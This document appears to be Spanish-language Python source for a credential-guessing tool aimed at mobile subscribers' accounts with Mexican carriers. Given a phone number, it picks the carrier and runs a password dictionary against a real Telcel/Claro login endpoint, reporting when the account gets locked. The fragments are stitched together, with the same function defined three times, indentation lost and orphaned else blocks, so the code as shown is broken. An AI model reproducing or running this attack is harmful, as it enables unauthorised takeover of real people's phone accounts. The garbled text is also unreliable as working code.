def ataqueDiccionario(self):
colores.textPrimario(" >>> Casi empezamos ")
_contraseñas = validacion.leerContraseñas()
colores.hr()
colores.textPrimario(" >>> Atancando ... \n")
for _contraseña in _contraseñas:
_contraseña = _contraseña.rstrip('\n')
_response = self.ataque(self.numero, _contraseña)
print(" Probando:", _contraseña.ljust(30), "\033[0;m", end='\r')
if _response.json()["objectResponse"]["esValido"]:
colores.hr()
colores.textSuccess("\t\t\t[ Contraseña correcta : " +
_contraseña + "]")
colores.hr()
exit()
colores.hr()
colores.textError("\t\t\t[ Contraseña no encontrada ]")
colores.hr()
exit()
def ataqueDiccionario(self):
colores.textPrimario(" >>> Tranquilo vaquero ")
colores.textError(
" Movistar tiene una extraña y/o segura forma de validar el inicio de sesión "
)
colores.textError(
" [ cookies, parametros, sesiones, valores aleatorios ] ")
colores.textPrimario(
" Es mucho más fácil utilizar burpsuit para el ataque ;)")
colores.hr()
exit()
def leerContraseñas(_msj=""):
if _msj != "":
colores.textError(_msj)
_archivo = colores.inputBold(' ¿ Cual es el nombre del diccionario ? : ')
if not os.path.exists(_archivo):
leerContraseñas("El archivo no existe")
_f = open(_archivo, "r")
_contraseñas = _f.readlines()
_f.close()
return _contraseñas
def main(_numero):
_celular = validacion.comprobarCompañia(_numero)
colores.textBold(" Número : " + _celular.numero)
colores.textBold(" Nombre de Compañia : " + _celular.compañia)
colores.textBold(" ¿ Registado en la plataforma de la compañia ? : " + str(_celular.registradoWeb))
colores.hr()
if _celular.registradoWeb:
colores.textPrimario(" >>> Confirmar ataque")
_confirmarAtaque = colores.inputBold(' Se puede realizar un ataque de diccionario, ¿Quieres intentarlo? (s/n) : ')
colores.hr()
if _confirmarAtaque == 's' or _confirmarAtaque == 'S':
_celular.ataqueDiccionario()
else:
colores.textError(" >>> Ataque no ejecutado \n")
exit()
else:
colores.textError(' Con base en la "euristica" ( 3 ifs ) de este poderoso script')
colores.textError(' Es imposible realizar un ataque de diccionario en su portal')
colores.hr()
exit()
def ataqueDiccionario(self):
if not self.bloqueado:
colores.textPrimario(" >>> Casi empezamos ")
colores.textError(
" El sistema de Telcel es 'bueno' por lo que al 20-25 intento se bloquea temporalmente (10 min aprox)"
)
_archivo = colores.inputBold(" ¿ Quieres continuar s/n ? : ")
if _archivo != 's':
colores.hr()
colores.textError(" >>> Bien pensado ;)")
colores.hr()
exit()
colores.hr()
colores.textPrimario(" >>> Atancando ... \n")
_contraseñas = validacion.leerContraseñas()
for _contraseña in _contraseñas:
_contraseña = _contraseña.rstrip('\n')
_response = requests.post(
'https://sso.claro.com:9080/login?sitedomain=https://www.mitelcel.com/mitelcel&CCode=52&Type=MSISDN&Invocation=iFrame',
headers=self.headers(),
data=self.data(self.numero, _contraseña),
timeout=50)
print(" Probando:",
_contraseña.ljust(30),
"\033[0;m",
end='\r')
if 'intentos' in _response.text:
colores.hr()
colores.textError("\t\t\t Ya nos bloquearon :( ")
colores.hr()
exit()
if 'incorrecta' not in _response.text:
colores.hr()
colores.textSuccess(
"\t\t\t[ Contraseña correcta ( 90% seguro ) : " +
_contraseña + "]")
colores.hr()
exit()
colores.textError("\t\t\t[ Contraseña no encontrada ]")
colores.hr()
exit()
else:
colores.textError(" ¡¡¡ CUIDADO !!! \n")
colores.textError(
"La cuenta esta bloqueada temporalmente. Ejecute el script más tarde. "
)
colores.hr()
exit()
else:
colores.textError(" >>> Ataque no ejecutado \n")
exit()
else:
colores.textError(' Con base en la "euristica" ( 3 ifs ) de este poderoso script')
colores.textError(' Es imposible realizar un ataque de diccionario en su portal')
colores.hr()
exit()
if __name__ == "__main__":
banner()
if len(sys.argv) <= 1:
colores.textError(" Debes de pasar como parametro el número celular con un formato de 10 digito")
colores.textError(" Ejemplo : python3" + sys.argv[0] + " 5511223344")
colores.hr()
exit()
else:
_check = validacion.comprobarEstructuraNumero(sys.argv[1])
if _check:
main(sys.argv[1])
else:
colores.textError(" Debes de pasar como parametro el número celular con un formato de 10 digito")
colores.textError(" Ejemplo : python3" + sys.argv[0] + " 5511223344")
colores.hr()
exit()